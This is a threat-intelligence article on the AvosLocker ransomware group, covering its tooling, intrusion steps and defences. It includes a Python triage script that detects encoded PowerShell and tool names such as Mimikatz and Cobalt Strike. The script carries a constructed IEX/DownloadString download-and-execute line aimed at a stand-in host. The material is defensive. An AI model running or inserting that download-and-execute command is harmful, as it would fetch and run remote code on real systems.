The Avos ransomware threat actor has recently updated its tooling, using not only malicious software but also commercial products.
A new report from Cisco Talos Intelligence Group exposes new tools used in Avos ransomware attacks.
Who is Avos?
Avos is a ransomware group active since July 2021. The group follows the Ransomware as a Service business model, which means it provides ransomware services to different affiliates (Figure A).
AvosLocker currently supports Windows, Linux and ESXi environments and provides automatic, highly configurable builds of the AvosLocker malware. In addition, the threat actor provides a control panel for the affiliates, a negotiation panel with push and sound notifications, decryption tests, and access to a diverse network of penetration testers, initial access brokers and other contacts.
Avos also provides calling services and DDoS attacks: the group places phone calls to victims to pressure them into paying the ransom, or performs DDoS attacks during the negotiation to add stress to the situation.
AvosLocker has already targeted critical infrastructure in the US, such as financial services, manufacturing and government facilities, according to the FBI. The Avos team does not allow attacks against post-Soviet Union countries. A user nicknamed “Avos” has been observed trying to recruit penetration testers with experience in Active Directory networks, as well as initial access brokers, on a Russian forum.
In late 2021, the group apologized for one attack aimed at a U.S. police agency and provided an immediate and free decryption for all the data that had been encrypted. An affiliate had targeted that police agency, most likely without realizing what it was, so the Avos group decided to provide the decryption to the agency.
AvosLocker infections & tools
Spam email campaigns are used as an initial infection vector to gain a foothold in the targeted network before deploying the ransomware.
Other methods may be used for the initial infection. Talos observed a case where the initial compromise was done via an ESXi server exposed on the internet through VMware Horizon Unified Access Gateways (UAG) and vulnerable to the Log4Shell vulnerability.
Once inside the compromised network, the attackers used several malicious tools on endpoints. They also used LoLBins (Living-off-the-Land Binaries), which are non-malicious binaries already installed on the operating system, such as the WMI Provider Host (wmiprvse.exe).
Four weeks after the initial compromise, the threat actor ran an encoded PowerShell command using DownloadString. In the following days, several PowerShell commands were run to download additional files and tools such as Mimikatz and Cobalt Strike beacons. A port scanner known as the SoftPerfect Network Scanner was also downloaded and used. This port scanner is a commercially available tool, and Avos is known to make frequent use of it. The cybercriminals then modified administrative settings on a local and a remote host to move to the lateral movement phase of the attack.
Another instance of the port scanner was transferred via AnyDesk to another server in the compromised network.
Once all reconnaissance and lateral movement have been completed, the attackers use a legitimate software deployment tool named PDQ Deploy to spread the ransomware and other tools across the target network.
In the past, Avos attacks have also revealed the use of other tools: the PuTTY Secure Copy client (pscp.exe), Rclone, Advanced IP Scanner and WinLister.
At the end of the process, victims are shown a ransom note (Figure B).
Avos victims who do not pay have their data sold, as stated on the Avos website: “All data is FOR SALE. Contact us with your offers. We only sell data to third parties if the owner of said data refuses to pay.”
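As an added detection example, not code from Talos or from this article: a small Python triage routine that decodes the base64/UTF-16LE payload of a PowerShell -EncodedCommand from process-creation command lines, flags the DownloadString pattern described above, and matches the tool names the article lists (several of them legitimate, so a hit is a lead for an analyst, not a verdict). The sample command lines are constructed.

```python
import base64
import re

# Matches the -EncodedCommand switch (and its short forms) followed by the base64 payload
ENC_FLAG = re.compile(r"\s-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Download-and-execute idioms; the report describes DownloadString in the encoded stage
SCRIPT_IDIOMS = re.compile(r"\biex\b|invoke-expression|downloadstring|downloadfile", re.IGNORECASE)
# Tool names the article ties to Avos intrusions; crude substring matching by design
TOOL_NAMES = ("mimikatz", "cobalt", "anydesk", "pdq", "pscp.exe", "rclone", "winlister")


def encode_ps(script: str) -> str:
    """Base64 of UTF-16LE text, the form PowerShell expects after -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if cmdline carries an encoded command, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(cmdline: str) -> list:
    """List the reasons a process command line deserves analyst attention."""
    reasons = []
    m = ENC_FLAG.search(cmdline)
    visible = cmdline[:m.start(1)] if m else cmdline  # command line minus the base64 blob
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded PowerShell")
        for idiom in SCRIPT_IDIOMS.findall(decoded):
            reasons.append("decoded script uses " + idiom.lower())
    # Look for tool names in the visible arguments and in the decoded script, never in the blob
    haystack = (visible + " " + (decoded or "")).lower()
    reasons.extend("known tool: " + name for name in TOOL_NAMES if name in haystack)
    return reasons


# Constructed sample process-creation command lines, not from the Talos report
SAMPLE_COMMAND_LINES = [
    "powershell.exe -nop -w hidden -enc "
    + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"),
    "powershell.exe -ep bypass Get-Date",
    "C:\\Temp\\AnyDesk.exe --silent",
    "notepad.exe readme.txt",
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        print(triage(line) or "clean", "<-", line[:60])
```

Feed it the CommandLine field of Sysmon event ID 1 or Windows Security event 4688 (with command-line auditing enabled) to get the same triage over real telemetry.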
How to protect yourself from Avos
Network segmentation should be implemented to reduce the risk of the entire organization being shut down by ransomware. Strong backup policies also need to be in place to avoid losing data in case of a successful attack.
Multi-factor authentication should be deployed for every service facing the Internet, especially VPN access and webmail systems. Access should be configured with the least privileges.
Antivirus and security solutions need to be deployed in order to detect the threat. Real-time protection should always be enabled. All systems and software need to be up to date and patched to avoid falling victim to common vulnerabilities.
Training and awareness should be provided for every employee, especially to recognize phishing emails or any social engineering trick that might target the user.
Disclosure: I work for Trend Micro, but the views expressed in this article are mine.